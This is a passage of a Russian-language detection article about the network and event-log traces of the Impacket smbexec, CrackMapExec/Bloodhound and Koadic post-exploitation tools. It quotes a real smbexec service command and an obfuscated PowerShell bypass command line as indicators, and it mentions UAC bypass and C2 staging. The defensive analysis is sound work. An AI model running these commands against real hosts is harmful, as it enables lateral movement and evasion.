Как ΠΈ Ρƒ ΠΌΠ½ΠΎΠ³ΠΈΡ… инструмСнтов для постэксплуатации, Ρƒ Impacket Π΅ΡΡ‚ΡŒ ΠΌΠΎΠ΄ΡƒΠ»ΠΈ для ΡƒΠ΄Π°Π»Π΅Π½Π½ΠΎΠ³ΠΎ выполнСния ΠΊΠΎΠΌΠ°Π½Π΄. ΠœΡ‹ остановимся Π½Π° smbexec, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ Π΄Π°Π΅Ρ‚ ΠΈΠ½Ρ‚Π΅Ρ€Π°ΠΊΡ‚ΠΈΠ²Π½ΡƒΡŽ ΠΊΠΎΠΌΠ°Π½Π΄Π½ΡƒΡŽ ΠΎΠ±ΠΎΠ»ΠΎΡ‡ΠΊΡƒ Π½Π° ΡƒΠ΄Π°Π»Π΅Π½Π½ΠΎΠΉ машинС. Для этого модуля Ρ‚Π°ΠΊΠΆΠ΅ трСбуСтся аутСнтификация Ρ‡Π΅Ρ€Π΅Π· SMB Π»ΠΈΠ±ΠΎ ΠΏΠ°Ρ€ΠΎΠ»Π΅ΠΌ, Π»ΠΈΠ±ΠΎ Π΅Π³ΠΎ Ρ…Π΅ΡˆΠ΅ΠΌ. На рис. 3 ΠΌΡ‹ Π²ΠΈΠ΄ΠΈΠΌ ΠΏΡ€ΠΈΠΌΠ΅Ρ€ Ρ€Π°Π±ΠΎΡ‚Ρ‹ Ρ‚Π°ΠΊΠΎΠ³ΠΎ инструмСнта, Π² Π΄Π°Π½Π½ΠΎΠΌ случаС это консоль локального администратора.

Как ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΡ‚ΡŒ Π°Ρ‚Π°ΠΊΠΈ Π½Π° Windows-инфраструктуру: ΠΈΠ·ΡƒΡ‡Π°Π΅ΠΌ инструмСнтарий Ρ…Π°ΠΊΠ΅Ρ€ΠΎΠ²
Рис. 3. Π˜Π½Ρ‚Π΅Ρ€Π°ΠΊΡ‚ΠΈΠ²Π½Π°Ρ консоль smbexec

ΠŸΠ΅Ρ€Π²Ρ‹ΠΌ этапом Ρ€Π°Π±ΠΎΡ‚Ρ‹ smbexec послС Π°ΡƒΡ‚Π΅Π½Ρ‚ΠΈΡ„ΠΈΠΊΠ°Ρ†ΠΈΠΈ являСтся ΠΎΡ‚ΠΊΡ€Ρ‹Ρ‚ΠΈΠ΅ SCM ΠΊΠΎΠΌΠ°Π½Π΄ΠΎΠΉ OpenSCManagerW (15). Запрос ΠΏΡ€ΠΈΠΌΠ΅Ρ‡Π°Ρ‚Π΅Π»Π΅Π½: Π² Π½Π΅ΠΌ ΠΏΠΎΠ»Π΅ MachineName ΠΈΠΌΠ΅Π΅Ρ‚ Π·Π½Π°Ρ‡Π΅Π½ΠΈΠ΅ DUMMY.

Как ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΡ‚ΡŒ Π°Ρ‚Π°ΠΊΠΈ Π½Π° Windows-инфраструктуру: ΠΈΠ·ΡƒΡ‡Π°Π΅ΠΌ инструмСнтарий Ρ…Π°ΠΊΠ΅Ρ€ΠΎΠ²
Рис. 4. Запрос Π½Π° ΠΎΡ‚ΠΊΡ€Ρ‹Ρ‚ΠΈΠ΅ Service Control Manager

Π”Π°Π»Π΅Π΅ происходит созданиС сСрвиса с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ ΠΊΠΎΠΌΠ°Π½Π΄Ρ‹ CreateServiceW (12). Π’ случаС smbexec ΠΌΡ‹ ΠΌΠΎΠΆΠ΅ΠΌ Π²ΠΈΠ΄Π΅Ρ‚ΡŒ ΠΊΠ°ΠΆΠ΄Ρ‹ΠΉ Ρ€Π°Π· ΠΎΠ΄ΠΈΠ½Π°ΠΊΠΎΠ²ΡƒΡŽ Π»ΠΎΠ³ΠΈΠΊΡƒ построСния ΠΊΠΎΠΌΠ°Π½Π΄Ρ‹. На рис. 5 Π·Π΅Π»Π΅Π½Ρ‹ΠΌ Ρ†Π²Π΅Ρ‚ΠΎΠΌ ΠΎΡ‚ΠΌΠ΅Ρ‡Π΅Π½Ρ‹ нСизмСняСмыС ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚Ρ€Ρ‹ ΠΊΠΎΠΌΠ°Π½Π΄Ρ‹, ΠΆΠ΅Π»Ρ‚Ρ‹ΠΌ β€” Ρ‚ΠΎ, Ρ‡Ρ‚ΠΎ Π°Ρ‚Π°ΠΊΡƒΡŽΡ‰ΠΈΠΉ ΠΌΠΎΠΆΠ΅Ρ‚ ΠΈΠ·ΠΌΠ΅Π½ΠΈΡ‚ΡŒ. НСтрудно Π·Π°ΠΌΠ΅Ρ‚ΠΈΡ‚ΡŒ, Ρ‡Ρ‚ΠΎ имя исполняСмого Ρ„Π°ΠΉΠ»Π°, Π΅Π³ΠΎ Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΡŽ ΠΈ Ρ„Π°ΠΉΠ» output ΠΈΠ·ΠΌΠ΅Π½ΠΈΡ‚ΡŒ ΠΌΠΎΠΆΠ½ΠΎ, Π½ΠΎ ΠΎΡΡ‚Π°Π²ΡˆΠ΅Π΅ΡΡ ΠΏΠΎΠΌΠ΅Π½ΡΡ‚ΡŒ ΠΊΡƒΠ΄Π° слоТнСС, Π½Π΅ Π½Π°Ρ€ΡƒΡˆΠ°Ρ Π»ΠΎΠ³ΠΈΠΊΡƒ Ρ€Π°Π±ΠΎΡ‚Ρ‹ модуля Impacket.

Как ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΡ‚ΡŒ Π°Ρ‚Π°ΠΊΠΈ Π½Π° Windows-инфраструктуру: ΠΈΠ·ΡƒΡ‡Π°Π΅ΠΌ инструмСнтарий Ρ…Π°ΠΊΠ΅Ρ€ΠΎΠ²
Рис. 5. Запрос Π½Π° созданиС сСрвиса с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ Service Control Manager

Smbexec Ρ‚Π°ΠΊΠΆΠ΅ оставляСт явныС слСды Π² ΠΆΡƒΡ€Π½Π°Π»Π΅ событий Windows. Π’ ΠΆΡƒΡ€Π½Π°Π»Π΅ Windows Server 2016 для ΠΈΠ½Ρ‚Π΅Ρ€Π°ΠΊΡ‚ΠΈΠ²Π½ΠΎΠΉ ΠΊΠΎΠΌΠ°Π½Π΄Π½ΠΎΠΉ ΠΎΠ±ΠΎΠ»ΠΎΡ‡ΠΊΠΈ с ΠΊΠΎΠΌΠ°Π½Π΄ΠΎΠΉ ipconfig ΡƒΠ²ΠΈΠ΄ΠΈΠΌ ΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΡƒΡŽ ΠΊΠ»ΡŽΡ‡Π΅Π²ΡƒΡŽ ΠΏΠΎΡΠ»Π΅Π΄ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒΠ½ΠΎΡΡ‚ΡŒ событий:

1. 4697 β€” установка сСрвиса Π½Π° машинС ΠΆΠ΅Ρ€Ρ‚Π²Ρ‹:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 β€” созданиС процСсса cmd.exe с Π°Ρ€Π³ΡƒΠΌΠ΅Π½Ρ‚Π°ΠΌΠΈ ΠΈΠ· ΠΏΡƒΠ½ΠΊΡ‚Π° 1.
3. 5145 β€” ΠΏΡ€ΠΎΠ²Π΅Ρ€ΠΊΠ° ΠΏΡ€Π°Π² доступа ΠΊ Ρ„Π°ΠΉΠ»Ρƒ __output Π² Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΠΈ C$.
4. 4697 β€” установка сСрвиса Π½Π° машинС ΠΆΠ΅Ρ€Ρ‚Π²Ρ‹.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 β€” созданиС процСсса cmd.exe с Π°Ρ€Π³ΡƒΠΌΠ΅Π½Ρ‚Π°ΠΌΠΈ ΠΈΠ· ΠΏΡƒΠ½ΠΊΡ‚Π° 4.
6. 5145 β€” ΠΏΡ€ΠΎΠ²Π΅Ρ€ΠΊΠ° ΠΏΡ€Π°Π² доступа ΠΊ Ρ„Π°ΠΉΠ»Ρƒ __output Π² Π΄ΠΈΡ€Π΅ΠΊΡ‚ΠΎΡ€ΠΈΠΈ C$.

Impacket являСтся основой для Ρ€Π°Π·Ρ€Π°Π±ΠΎΡ‚ΠΊΠΈ инструмСнтов для Π°Ρ‚Π°ΠΊ. Он ΠΏΠΎΠ΄Π΄Π΅Ρ€ΠΆΠΈΠ²Π°Π΅Ρ‚ ΠΏΠΎΡ‡Ρ‚ΠΈ всС ΠΏΡ€ΠΎΡ‚ΠΎΠΊΠΎΠ»Ρ‹ Π² Windows-инфраструктурС ΠΈ ΠΏΡ€ΠΈ этом ΠΈΠΌΠ΅Π΅Ρ‚ свои Ρ…Π°Ρ€Π°ΠΊΡ‚Π΅Ρ€Π½Ρ‹Π΅ особСнности. Π—Π΄Π΅ΡΡŒ ΠΈ ΠΊΠΎΠ½ΠΊΡ€Π΅Ρ‚Π½Ρ‹Π΅ winreg-запросы, ΠΈ использованиС SCM API с Ρ…Π°Ρ€Π°ΠΊΡ‚Π΅Ρ€Π½Ρ‹ΠΌ Ρ„ΠΎΡ€ΠΌΠΈΡ€ΠΎΠ²Π°Π½ΠΈΠ΅ΠΌ ΠΊΠΎΠΌΠ°Π½Π΄, ΠΈ Ρ„ΠΎΡ€ΠΌΠ°Ρ‚ ΠΈΠΌΠ΅Π½ Ρ„Π°ΠΉΠ»ΠΎΠ², ΠΈ SMB share SYSTEM32.

CRACKMAPEXEC

Π˜Π½ΡΡ‚Ρ€ΡƒΠΌΠ΅Π½Ρ‚ CME ΠΏΡ€ΠΈΠ·Π²Π°Π½ Π² ΠΏΠ΅Ρ€Π²ΡƒΡŽ ΠΎΡ‡Π΅Ρ€Π΅Π΄ΡŒ Π°Π²Ρ‚ΠΎΠΌΠ°Ρ‚ΠΈΠ·ΠΈΡ€ΠΎΠ²Π°Ρ‚ΡŒ Ρ‚Π΅ Ρ€ΡƒΡ‚ΠΈΠ½Π½Ρ‹Π΅ дСйствия, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ приходится Π²Ρ‹ΠΏΠΎΠ»Π½ΡΡ‚ΡŒ Π°Ρ‚Π°ΠΊΡƒΡŽΡ‰Π΅ΠΌΡƒ для продвиТСния Π²Π½ΡƒΡ‚Ρ€ΠΈ сСти. Он позволяСт Ρ€Π°Π±ΠΎΡ‚Π°Ρ‚ΡŒ Π² связкС с нСбСзызвСстными Empire agent ΠΈ Meterpreter. Π§Ρ‚ΠΎΠ±Ρ‹ Π²Ρ‹ΠΏΠΎΠ»Π½ΡΡ‚ΡŒ ΠΊΠΎΠΌΠ°Π½Π΄Ρ‹ скрытно, CME ΠΌΠΎΠΆΠ΅Ρ‚ ΠΈΡ… ΠΎΠ±Ρ„ΡƒΡΡ†ΠΈΡ€ΠΎΠ²Π°Ρ‚ΡŒ. Π˜ΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡ Bloodhound (ΠΎΡ‚Π΄Π΅Π»ΡŒΠ½Ρ‹ΠΉ инструмСнт для провСдСния Ρ€Π°Π·Π²Π΅Π΄ΠΊΠΈ), Π°Ρ‚Π°ΠΊΡƒΡŽΡ‰ΠΈΠΉ ΠΌΠΎΠΆΠ΅Ρ‚ Π°Π²Ρ‚ΠΎΠΌΠ°Ρ‚ΠΈΠ·ΠΈΡ€ΠΎΠ²Π°Ρ‚ΡŒ поиск Π°ΠΊΡ‚ΠΈΠ²Π½ΠΎΠΉ сСссии Π΄ΠΎΠΌΠ΅Π½Π½ΠΎΠ³ΠΎ администратора.

Bloodhound

Bloodhound ΠΊΠ°ΠΊ ΡΠ°ΠΌΠΎΡΡ‚ΠΎΡΡ‚Π΅Π»ΡŒΠ½Ρ‹ΠΉ инструмСнт позволяСт вСсти ΠΏΡ€ΠΎΠ΄Π²ΠΈΠ½ΡƒΡ‚ΡƒΡŽ Ρ€Π°Π·Π²Π΅Π΄ΠΊΡƒ Π²Π½ΡƒΡ‚Ρ€ΠΈ сСти. Он собираСт Π΄Π°Π½Π½Ρ‹Π΅ ΠΎ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡΡ…, ΠΌΠ°ΡˆΠΈΠ½Π°Ρ…, Π³Ρ€ΡƒΠΏΠΏΠ°Ρ…, сСссиях ΠΈ поставляСтся Π² Π²ΠΈΠ΄Π΅ скрипта Π½Π° PowerShell ΠΈΠ»ΠΈ Π±ΠΈΠ½Π°Ρ€Π½ΠΎΠ³ΠΎ Ρ„Π°ΠΉΠ»Π°. Для сбора ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠΈ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡŽΡ‚ΡΡ LDAP ΠΈΠ»ΠΈ ΠΏΡ€ΠΎΡ‚ΠΎΠΊΠΎΠ»Ρ‹, Π±Π°Π·ΠΈΡ€ΡƒΡŽΡ‰ΠΈΠ΅ΡΡ Π½Π° SMB. Π˜Π½Ρ‚Π΅Π³Ρ€Π°Ρ†ΠΈΠΎΠ½Π½Ρ‹ΠΉ ΠΌΠΎΠ΄ΡƒΠ»ΡŒ CME позволяСт Π·Π°Π³Ρ€ΡƒΠΆΠ°Ρ‚ΡŒ Bloodhound Π½Π° ΠΌΠ°ΡˆΠΈΠ½Ρƒ ΠΆΠ΅Ρ€Ρ‚Π²Ρ‹, Π·Π°ΠΏΡƒΡΠΊΠ°Ρ‚ΡŒ ΠΈ ΠΏΠΎΠ»ΡƒΡ‡Π°Ρ‚ΡŒ собранныС Π΄Π°Π½Π½Ρ‹Π΅ послС выполнСния, Ρ‚Π΅ΠΌ самым автоматизируя дСйствия Π² систСмС ΠΈ дСлая ΠΈΡ… ΠΌΠ΅Π½Π΅Π΅ Π·Π°ΠΌΠ΅Ρ‚Π½Ρ‹ΠΌΠΈ. ГрафичСская ΠΎΠ±ΠΎΠ»ΠΎΡ‡ΠΊΠ° Bloodhound прСдставляСт собранныС Π΄Π°Π½Π½Ρ‹Π΅ Π² Π²ΠΈΠ΄Π΅ Π³Ρ€Π°Ρ„ΠΎΠ², Ρ‡Ρ‚ΠΎ позволяСт Π½Π°ΠΉΡ‚ΠΈ ΠΊΡ€Π°Ρ‚Ρ‡Π°ΠΉΡˆΠΈΠΉ ΠΏΡƒΡ‚ΡŒ ΠΎΡ‚ ΠΌΠ°ΡˆΠΈΠ½Ρ‹ Π°Ρ‚Π°ΠΊΡƒΡŽΡ‰Π΅Π³ΠΎ Π΄ΠΎ Π΄ΠΎΠΌΠ΅Π½Π½ΠΎΠ³ΠΎ администратора.

Как ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΡ‚ΡŒ Π°Ρ‚Π°ΠΊΠΈ Π½Π° Windows-инфраструктуру: ΠΈΠ·ΡƒΡ‡Π°Π΅ΠΌ инструмСнтарий Ρ…Π°ΠΊΠ΅Ρ€ΠΎΠ²
Рис. 6. Π˜Π½Ρ‚Π΅Ρ€Ρ„Π΅ΠΉΡ Bloodhound

Для запуска Π½Π° машинС ΠΆΠ΅Ρ€Ρ‚Π²Ρ‹ ΠΌΠΎΠ΄ΡƒΠ»ΡŒ создаСт Π·Π°Π΄Π°Ρ‡Ρƒ, ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡ ATSVC ΠΈ SMB. ATSVC являСтся интСрфСйсом для Ρ€Π°Π±ΠΎΡ‚Ρ‹ с ΠΏΠ»Π°Π½ΠΈΡ€ΠΎΠ²Ρ‰ΠΈΠΊΠΎΠΌ Π·Π°Π΄Π°Ρ‡ Windows. CME ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅Ρ‚ Π΅Π³ΠΎ Ρ„ΡƒΠ½ΠΊΡ†ΠΈΡŽ NetrJobAdd (1) для создания Π·Π°Π΄Π°Ρ‡ ΠΏΠΎ сСти. ΠŸΡ€ΠΈΠΌΠ΅Ρ€ Ρ‚ΠΎΠ³ΠΎ, Ρ‡Ρ‚ΠΎ отправляСт ΠΌΠΎΠ΄ΡƒΠ»ΡŒ CME, ΠΏΠΎΠΊΠ°Π·Π°Π½ Π½Π° рис. 7: это Π²Ρ‹Π·ΠΎΠ² ΠΊΠΎΠΌΠ°Π½Π΄Ρ‹ cmd.exe ΠΈ обфусцированный ΠΊΠΎΠ΄ Π² Π²ΠΈΠ΄Π΅ Π°Ρ€Π³ΡƒΠΌΠ΅Π½Ρ‚ΠΎΠ² Π² Ρ„ΠΎΡ€ΠΌΠ°Ρ‚Π΅ XML.

Как ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΡ‚ΡŒ Π°Ρ‚Π°ΠΊΠΈ Π½Π° Windows-инфраструктуру: ΠΈΠ·ΡƒΡ‡Π°Π΅ΠΌ инструмСнтарий Ρ…Π°ΠΊΠ΅Ρ€ΠΎΠ²
Рис.7. Π‘ΠΎΠ·Π΄Π°Π½ΠΈΠ΅ Π·Π°Π΄Π°Ρ‡ΠΈ Ρ‡Π΅Ρ€Π΅Π· CME

ПослС Ρ‚ΠΎΠ³ΠΎ ΠΊΠ°ΠΊ Π·Π°Π΄Π°Ρ‡Π° поступила Π½Π° исполнСниС, машина ΠΆΠ΅Ρ€Ρ‚Π²Ρ‹ запускаСт сам Bloodhound, ΠΈ Π² Ρ‚Ρ€Π°Ρ„ΠΈΠΊΠ΅ это ΠΌΠΎΠΆΠ½ΠΎ ΡƒΠ²ΠΈΠ΄Π΅Ρ‚ΡŒ. Для модуля Ρ…Π°Ρ€Π°ΠΊΡ‚Π΅Ρ€Π½Ρ‹ LDAP-запросы для получСния стандартных Π³Ρ€ΡƒΠΏΠΏ, списка всСх машин ΠΈ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Π΅ΠΉ Π² Π΄ΠΎΠΌΠ΅Π½Π΅, ΠΏΠΎΠ»ΡƒΡ‡Π΅Π½ΠΈΠ΅ ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠΈ ΠΎΠ± Π°ΠΊΡ‚ΠΈΠ²Π½Ρ‹Ρ… ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒΡΠΊΠΈΡ… сСссиях Ρ‡Π΅Ρ€Π΅Π· запрос SRVSVC NetSessEnum.

Как ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΡ‚ΡŒ Π°Ρ‚Π°ΠΊΠΈ Π½Π° Windows-инфраструктуру: ΠΈΠ·ΡƒΡ‡Π°Π΅ΠΌ инструмСнтарий Ρ…Π°ΠΊΠ΅Ρ€ΠΎΠ²
Рис. 8. ΠŸΠΎΠ»ΡƒΡ‡Π΅Π½ΠΈΠ΅ списка Π°ΠΊΡ‚ΠΈΠ²Π½Ρ‹Ρ… сСссий Ρ‡Π΅Ρ€Π΅Π· SMB

ΠšΡ€ΠΎΠΌΠ΅ Ρ‚ΠΎΠ³ΠΎ, запуск Bloodhound Π½Π° машинС ΠΆΠ΅Ρ€Ρ‚Π²Ρ‹ с Π²ΠΊΠ»ΡŽΡ‡Π΅Π½Π½Ρ‹ΠΌ Π°ΡƒΠ΄ΠΈΡ‚ΠΎΠΌ сопровоТдаСтся событиСм с ID 4688 (создания процСсса) ΠΈ ΠΈΠΌΠ΅Π½Π΅ΠΌ процСсса Β«C:WindowsSystem32cmd.exeΒ». ΠŸΡ€ΠΈΠΌΠ΅Ρ‡Π°Ρ‚Π΅Π»ΡŒΠ½Ρ‹ΠΌ Π² Π½Π΅ΠΌ ΡΠ²Π»ΡΡŽΡ‚ΡΡ Π°Ρ€Π³ΡƒΠΌΠ΅Π½Ρ‚Ρ‹ ΠΊΠΎΠΌΠ°Π½Π΄Π½ΠΎΠΉ строки:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_avproducts

Π’Π΅ΡΡŒΠΌΠ° интСрСсСн с Ρ‚ΠΎΡ‡ΠΊΠΈ зрСния Ρ„ΡƒΠ½ΠΊΡ†ΠΈΠΎΠ½Π°Π»ΡŒΠ½ΠΎΡΡ‚ΠΈ ΠΈ Ρ€Π΅Π°Π»ΠΈΠ·Π°Ρ†ΠΈΠΈ ΠΌΠΎΠ΄ΡƒΠ»ΡŒ enum_avproducts. WMI позволяСт с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ языка запросов WQL ΠΏΠΎΠ»ΡƒΡ‡Π°Ρ‚ΡŒ Π΄Π°Π½Π½Ρ‹Π΅ Ρ€Π°Π·Π»ΠΈΡ‡Π½Ρ‹Ρ… ΠΎΠ±ΡŠΠ΅ΠΊΡ‚ΠΎΠ² Windows, Ρ‡Π΅ΠΌ ΠΏΠΎ сути ΠΈ ΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅Ρ‚ΡΡ этот ΠΌΠΎΠ΄ΡƒΠ»ΡŒ CME. Он Π³Π΅Π½Π΅Ρ€ΠΈΡ€ΡƒΠ΅Ρ‚ запросы ΠΊ классам AntiSpywareProduct ΠΈ AntiМirusProduct ΠΎ срСдствах Π·Π°Ρ‰ΠΈΡ‚Ρ‹, установлСнных Π½Π° машинС ΠΆΠ΅Ρ€Ρ‚Π²Ρ‹. Для Ρ‚ΠΎΠ³ΠΎ Ρ‡Ρ‚ΠΎΠ±Ρ‹ ΠΏΠΎΠ»ΡƒΡ‡ΠΈΡ‚ΡŒ Π½ΡƒΠΆΠ½Ρ‹Π΅ Π΄Π°Π½Π½Ρ‹Π΅, ΠΌΠΎΠ΄ΡƒΠ»ΡŒ выполняСт ΠΏΠΎΠ΄ΠΊΠ»ΡŽΡ‡Π΅Π½ΠΈΠ΅ ΠΊ пространству ΠΈΠΌΠ΅Π½ rootSecurityCenter2, Π·Π°Ρ‚Π΅ΠΌ Ρ„ΠΎΡ€ΠΌΠΈΡ€ΡƒΠ΅Ρ‚ WQL-запрос ΠΈ ΠΏΠΎΠ»ΡƒΡ‡Π°Π΅Ρ‚ ΠΎΡ‚Π²Π΅Ρ‚. На рис. 9 ΠΏΠΎΠΊΠ°Π·Π°Π½ΠΎ содСрТимоС Ρ‚Π°ΠΊΠΈΡ… запросов ΠΈ ΠΎΡ‚Π²Π΅Ρ‚ΠΎΠ². Π’ нашСм ΠΏΡ€ΠΈΠΌΠ΅Ρ€Π΅ нашСлся Windows Defender.

Как ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΡ‚ΡŒ Π°Ρ‚Π°ΠΊΠΈ Π½Π° Windows-инфраструктуру: ΠΈΠ·ΡƒΡ‡Π°Π΅ΠΌ инструмСнтарий Ρ…Π°ΠΊΠ΅Ρ€ΠΎΠ²
Рис. 9. БСтСвая Π°ΠΊΡ‚ΠΈΠ²Π½ΠΎΡΡ‚ΡŒ модуля enum_avproducts

Π—Π°Ρ‡Π°ΡΡ‚ΡƒΡŽ Π°ΡƒΠ΄ΠΈΡ‚ WMI (Trace WMI-Activity), Π² событиях ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠ³ΠΎ ΠΌΠΎΠΆΠ½ΠΎ Π½Π°ΠΉΡ‚ΠΈ ΠΏΠΎΠ»Π΅Π·Π½ΡƒΡŽ ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΡŽ ΠΎ WQL-запросах, ΠΌΠΎΠΆΠ΅Ρ‚ ΠΎΠΊΠ°Π·Π°Ρ‚ΡŒΡΡ Π²Ρ‹ΠΊΠ»ΡŽΡ‡Π΅Π½Π½Ρ‹ΠΌ. Но Ссли ΠΎΠ½ Π²ΠΊΠ»ΡŽΡ‡Π΅Π½, Ρ‚ΠΎ Π² случаС запуска сцСнария enum_avproducts сохранится событиС с ID 11. Π’ Π½Π΅ΠΌ Π±ΡƒΠ΄Π΅Ρ‚ ΡΠΎΠ΄Π΅Ρ€ΠΆΠ°Ρ‚ΡŒΡΡ имя ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ ΠΎΡ‚ΠΏΡ€Π°Π²ΠΈΠ» запрос, ΠΈ имя Π² пространствС ΠΈΠΌΠ΅Π½ rootSecurityCenter2.

Π£ ΠΊΠ°ΠΆΠ΄ΠΎΠ³ΠΎ ΠΈΠ· ΠΌΠΎΠ΄ΡƒΠ»Π΅ΠΉ CME ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΠ»ΠΈΡΡŒ свои Π°Ρ€Ρ‚Π΅Ρ„Π°ΠΊΡ‚Ρ‹, Π±ΡƒΠ΄ΡŒ Ρ‚ΠΎ спСцифичСскиС WQL-запросы ΠΈΠ»ΠΈ созданиС ΠΎΠΏΡ€Π΅Π΄Π΅Π»Π΅Π½Π½ΠΎΠ³ΠΎ Π²ΠΈΠ΄Π° Π·Π°Π΄Π°Ρ‡ΠΈ Π² task scheduler с обфускациСй ΠΈ характСрная для Bloodhound Π°ΠΊΡ‚ΠΈΠ²Π½ΠΎΡΡ‚ΡŒ Π² LDAP ΠΈ SMB.

KOADIC

ΠžΡ‚Π»ΠΈΡ‡ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎΠΉ ΠΎΡΠΎΠ±Π΅Π½Π½ΠΎΡΡ‚ΡŒΡŽ Koadic являСтся использованиС встроСнных Π² Windows ΠΈΠ½Ρ‚Π΅Ρ€ΠΏΡ€Π΅Ρ‚Π°Ρ‚ΠΎΡ€ΠΎΠ² JavaScript ΠΈ VBScript. Π’ этом смыслС ΠΎΠ½ слСдуСт Ρ‚Ρ€Π΅Π½Π΄Ρƒ living off the land β€” Ρ‚ΠΎ Π΅ΡΡ‚ΡŒ Π½Π΅ ΠΈΠΌΠ΅Π΅Ρ‚ Π²Π½Π΅ΡˆΠ½ΠΈΡ… зависимостСй ΠΈ ΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅Ρ‚ΡΡ стандартными срСдствами Windows. Π­Ρ‚ΠΎ инструмСнт для ΠΏΠΎΠ»Π½ΠΎΡ†Π΅Π½Π½ΠΎΠ³ΠΎ Command & Control (CnC), ΠΏΠΎΡΠΊΠΎΠ»ΡŒΠΊΡƒ послС зараТСния Π½Π° ΠΌΠ°ΡˆΠΈΠ½Ρƒ устанавливаСтся Β«ΠΈΠΌΠΏΠ»Π°Π½Ρ‚Β», ΠΏΠΎΠ·Π²ΠΎΠ»ΡΡŽΡ‰ΠΈΠΉ Π΅Π΅ ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»ΠΈΡ€ΠΎΠ²Π°Ρ‚ΡŒ. Вакая машина, Π² Ρ‚Π΅Ρ€ΠΌΠΈΠ½ΠΎΠ»ΠΎΠ³ΠΈΠΈ Koadic, называСтся Β«Π·ΠΎΠΌΠ±ΠΈΒ». ΠŸΡ€ΠΈ Π½Π΅Ρ…Π²Π°Ρ‚ΠΊΠ΅ ΠΏΡ€ΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΉ для ΠΏΠΎΠ»Π½ΠΎΡ†Π΅Π½Π½ΠΎΠΉ Ρ€Π°Π±ΠΎΡ‚Ρ‹ Π½Π° сторонС ΠΆΠ΅Ρ€Ρ‚Π²Ρ‹ Koadic ΠΈΠΌΠ΅Π΅Ρ‚ Π²ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎΡΡ‚ΡŒ ΠΈΡ… ΠΏΠΎΠ΄Π½ΡΡ‚ΡŒ, ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡ Ρ‚Π΅Ρ…Π½ΠΈΠΊΠΈ ΠΎΠ±Ρ…ΠΎΠ΄Π° контроля ΡƒΡ‡Π΅Ρ‚Π½Ρ‹Ρ… записСй (UAC bypass).

Как ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΡ‚ΡŒ Π°Ρ‚Π°ΠΊΠΈ Π½Π° Windows-инфраструктуру: ΠΈΠ·ΡƒΡ‡Π°Π΅ΠΌ инструмСнтарий Ρ…Π°ΠΊΠ΅Ρ€ΠΎΠ²
Рис. 10. Командная ΠΎΠ±ΠΎΠ»ΠΎΡ‡ΠΊΠ° Koadic

Π–Π΅Ρ€Ρ‚Π²Π° Π΄ΠΎΠ»ΠΆΠ½Π° сама ΠΈΠ½ΠΈΡ†ΠΈΠΈΡ€ΠΎΠ²Π°Ρ‚ΡŒ ΠΎΠ±Ρ‰Π΅Π½ΠΈΠ΅ с сСрвСром Command & Control. Для этого Π΅ΠΉ Π½Π΅ΠΎΠ±Ρ…ΠΎΠ΄ΠΈΠΌΠΎ ΠΎΠ±Ρ€Π°Ρ‚ΠΈΡ‚ΡŒΡΡ ΠΏΠΎ Π·Π°Ρ€Π°Π½Π΅Π΅ ΠΏΠΎΠ΄Π³ΠΎΡ‚ΠΎΠ²Π»Π΅Π½Π½ΠΎΠΌΡƒ URI ΠΈ ΠΏΠΎΠ»ΡƒΡ‡ΠΈΡ‚ΡŒ основноС Ρ‚Π΅Π»ΠΎ Koadic с ΠΏΠΎΠΌΠΎΡ‰ΡŒΡŽ ΠΎΠ΄Π½ΠΎΠ³ΠΎ ΠΈΠ· стСйдТСров. На рис. 11 ΠΏΠΎΠΊΠ°Π·Π°Π½ 